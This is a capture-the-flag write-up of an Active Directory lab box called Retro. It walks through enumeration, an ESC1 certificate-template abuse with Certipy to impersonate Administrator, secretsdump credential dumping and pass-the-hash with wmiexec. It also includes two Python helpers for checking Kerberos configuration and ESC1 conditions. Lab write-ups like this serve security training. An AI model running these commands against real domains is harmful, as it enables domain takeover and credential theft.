Difficulty: Medium
IP Address: 10.129.234.44
Date Completed: 2025-06-25
Retro was an ADCS-themed Windows box focused on certificate abuse for privilege escalation. While the core exploitation path was standard, the real challenge came from getting tooling (especially Certipy) to work correctly due to domain resolution and legacy configuration quirks.
nmap -p- -T4 -v 10.129.234.44 --min-rate 10000 -oA nmap/full
nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,3389 -sC -sV -oA nmap/scripts 10.129.234.44
# Using kerbrute to enumerate usernames
kerbrute userenum --dc 10.129.234.44 -d retro.htb users.txt
# kerbrute came back with a single valid user: trainee
# AS-REP roasting test
impacket-GetNPUsers retro.htb/ -dc-ip 10.129.234.44 -usersfile users.txt -format hashcat
# Nothing roastable: trainee requires Kerberos pre-authentication
# Enumerate LDAP as 'trainee' (password: trainee)
python3 ldapdomaindump.py -u trainee -p trainee -d retro.htb -ip 10.129.234.44
# The dump showed a computer account of interest: banking$
Initial attempts with Certipy v5.x failed with RPC and DNS errors. The cause was name resolution: the box's internal domain is retro.vl, not retro.htb, so the Kerberos realm and the DC hostname have to be pinned locally. All Certipy and Impacket commands from this point use retro.vl.
# Critical fix: /etc/hosts and krb5.conf must reflect internal domain `retro.vl`
echo "10.129.234.44 dc.retro.vl" | sudo tee -a /etc/hosts
# /etc/krb5.conf
[libdefaults]
default_realm = RETRO.VL
dns_lookup_realm = false
dns_lookup_kdc = false
[realms]
RETRO.VL = {
kdc = dc.retro.vl
admin_server = dc.retro.vl
}
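Before re-running Certipy it is worth checking that /etc/hosts and krb5.conf agree with each other and with the real domain, because the failure mode (RPC/DNS errors) is generic and does not point at the config. The checker below is an added example written for this page, not part of the original writeup and not Certipy or MIT Kerberos code; the two parser functions are minimal hypothetical helpers, and the sample files are constructed inline to mirror the broken retro.htb state and the fixed retro.vl state.

```python
"""Sanity-check Kerberos name resolution before running certipy/impacket -k.

Added example for this writeup, not from the original page or any tool.
The parsers are deliberately small: enough for the two files shown here.
"""
import re

DC_IP = "10.129.234.44"


def parse_hosts(text):
    """Return {hostname: ip} for every non-comment line of an /etc/hosts file."""
    mapping = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            mapping[name.lower()] = ip
    return mapping


def parse_krb5(text):
    """Minimal krb5.conf parser.

    Flat sections become {section: {key: value}}; the [realms] block becomes
    {'realms': {REALM: {key: value}}}. Only the keys we check are needed.
    """
    conf = {}
    section = None
    realm = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = re.match(r"\[(\w+)\]", line)
        if m:
            section = m.group(1)
            conf.setdefault(section, {})
            realm = None
            continue
        if section == "realms":
            m = re.match(r"([\w.\-]+)\s*=\s*\{", line)
            if m:
                realm = m.group(1)
                conf["realms"][realm] = {}
                continue
            if line == "}":
                realm = None
                continue
            if realm and "=" in line:
                k, v = (s.strip() for s in line.split("=", 1))
                conf["realms"][realm][k] = v
        elif section and "=" in line:
            k, v = (s.strip() for s in line.split("=", 1))
            conf[section][k] = v
    return conf


def check_kerberos_setup(hosts_text, krb5_text, domain, dc_fqdn, dc_ip):
    """Return a list of problems; an empty list means the setup is consistent."""
    problems = []
    realm = domain.upper()
    hosts = parse_hosts(hosts_text)
    conf = parse_krb5(krb5_text)
    lib = conf.get("libdefaults", {})
    if hosts.get(dc_fqdn.lower()) != dc_ip:
        problems.append(f"/etc/hosts does not map {dc_fqdn} to {dc_ip}")
    if lib.get("default_realm") != realm:
        problems.append(f"default_realm should be {realm}, got {lib.get('default_realm')}")
    for key in ("dns_lookup_realm", "dns_lookup_kdc"):
        # Defaults to true; with no DNS for the lab domain that breaks KDC lookup.
        if lib.get(key, "true").lower() != "false":
            problems.append(f"{key} must be false (no DNS for the lab domain)")
    kdc = conf.get("realms", {}).get(realm, {}).get("kdc", "").split(":")[0].lower()
    if kdc != dc_fqdn.lower():
        problems.append(f"[realms] {realm} kdc should be {dc_fqdn}, got {kdc or 'unset'}")
    return problems


# Constructed sample: the guessed HTB-style name that produced the errors.
BROKEN_HOSTS = "127.0.0.1 localhost\n10.129.234.44 dc.retro.htb\n"
BROKEN_KRB5 = "[libdefaults]\ndefault_realm = RETRO.HTB\n[realms]\nRETRO.HTB = {\n  kdc = dc.retro.htb\n}\n"

# Constructed sample: the fixed state matching the internal domain retro.vl.
FIXED_HOSTS = "127.0.0.1 localhost\n10.129.234.44 dc.retro.vl\n"
FIXED_KRB5 = (
    "[libdefaults]\ndefault_realm = RETRO.VL\ndns_lookup_realm = false\n"
    "dns_lookup_kdc = false\n[realms]\nRETRO.VL = {\n  kdc = dc.retro.vl\n"
    "  admin_server = dc.retro.vl\n}\n"
)

if __name__ == "__main__":
    for label, h, k in (("broken", BROKEN_HOSTS, BROKEN_KRB5), ("fixed", FIXED_HOSTS, FIXED_KRB5)):
        probs = check_kerberos_setup(h, k, "retro.vl", "dc.retro.vl", DC_IP)
        print(label, "OK" if not probs else probs)
```

Run it against the real files with `open("/etc/hosts").read()` and `open("/etc/krb5.conf").read()`; anything it reports is a fix to make before blaming Certipy.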
# Certipy find
certipy find -u trainee@retro.vl -p trainee -vulnerable -stdout
# certipy find flagged the RetroClients template as vulnerable to ESC1
# (the enrollee supplies the subject). trainee cannot enroll in it, but
# banking$ had enroll rights, so the request is made as the computer account,
# putting the Administrator UPN in the SAN
certipy req -u 'banking$@retro.vl' -p 'Password123' \
  -ca 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' \
  -upn 'administrator@retro.vl' -dns 'retro.vl' -key-size 4096
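The ESC1 verdict above is a conjunction of template properties, and it is useful to be able to re-derive it (for instance when `find` is run as one principal but the request has to be made as another). The checker below is an added example written for this page; it is not Certipy source, and the template attributes are constructed to look like a RetroClients-style template rather than copied from the box. The group memberships for banking$ and trainee are likewise assumed for illustration.

```python
"""Re-derive an ESC1 verdict from a template's attributes.

Added example for this writeup, not Certipy code. Attribute names follow the
AD schema (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, ...) but the
values below are constructed for illustration.
"""

# msPKI-Certificate-Name-Flag bit: the requester may supply the subject / SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: every request is held for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that make the issued certificate usable for AD authentication (PKINIT).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}


def esc1_reasons(template, holder):
    """Return the ESC1 conditions that are NOT met for `holder`.

    `holder` is the set of principals we can act as (the account plus the
    groups it belongs to). An empty result means the template is ESC1-abusable
    from that position.
    """
    failed = []
    if not template["enabled"]:
        failed.append("template is not published on the CA")
    if not (template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT):
        failed.append("ENROLLEE_SUPPLIES_SUBJECT not set (cannot choose the UPN)")
    if template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        failed.append("manager approval required")
    if template["ra_signatures"] > 0:
        failed.append("authorized signatures required")
    # No EKU at all means 'any purpose', which still allows authentication.
    if template["ekus"] and not (set(template["ekus"]) & AUTH_EKUS):
        failed.append("no authentication EKU (cert unusable for PKINIT)")
    if not (set(template["enrollment_rights"]) & holder):
        failed.append("none of " + ", ".join(sorted(holder)) + " may enroll")
    return failed


def is_esc1(template, holder):
    return not esc1_reasons(template, holder)


# Constructed: a template shaped like RetroClients as the page describes it.
RETRO_CLIENTS = {
    "name": "RetroClients",
    "enabled": True,
    "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "enrollment_flag": 0,
    "ra_signatures": 0,
    "ekus": ["1.3.6.1.5.5.7.3.2"],
    "enrollment_rights": ["Domain Computers", "Domain Admins"],
}
# Constructed: the same template hardened (no subject supply, approval on).
HARDENED = dict(RETRO_CLIENTS, name_flag=0, enrollment_flag=CT_FLAG_PEND_ALL_REQUESTS)

# Assumed memberships: a computer account vs. the low-privileged user.
BANKING = {"banking$", "Domain Computers", "Authenticated Users"}
TRAINEE = {"trainee", "Domain Users", "Authenticated Users"}

if __name__ == "__main__":
    for label, holder in (("banking$", BANKING), ("trainee", TRAINEE)):
        print(label, "->", esc1_reasons(RETRO_CLIENTS, holder) or "ESC1")
    print("hardened ->", esc1_reasons(HARDENED, BANKING))
```

The enrollment-rights check is the one that changes between the two accounts: the template is misconfigured either way, but only a principal that can enroll can turn that into a certificate for Administrator, which is why the request above is made as banking$ rather than trainee.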
# Certipy saved the certificate as administrator_retro.pfx
# Get a TGT from the certificate via PKINIT; this also writes
# administrator.ccache and prints the account's NT hash
certipy auth -pfx administrator_retro.pfx -domain retro.vl -dc-ip 10.129.234.44
# Dump hashes with the ccache from certipy auth (KRB5CCNAME must point at it).
# With -k the target has to be the DC hostname, not its IP, or the
# cifs/ service ticket request fails
secretsdump.py -k -no-pass retro.vl/administrator@dc.retro.vl
# secretsdump returns the NT hash for administrator; pass-the-hash for a shell
impacket-wmiexec administrator@10.129.234.44 -hashes :<NTLM_HASH>
Lesson learned: the ESC1 chain itself was routine; the time went into the /etc/hosts and krb5.conf tweaks.
✅ Box complete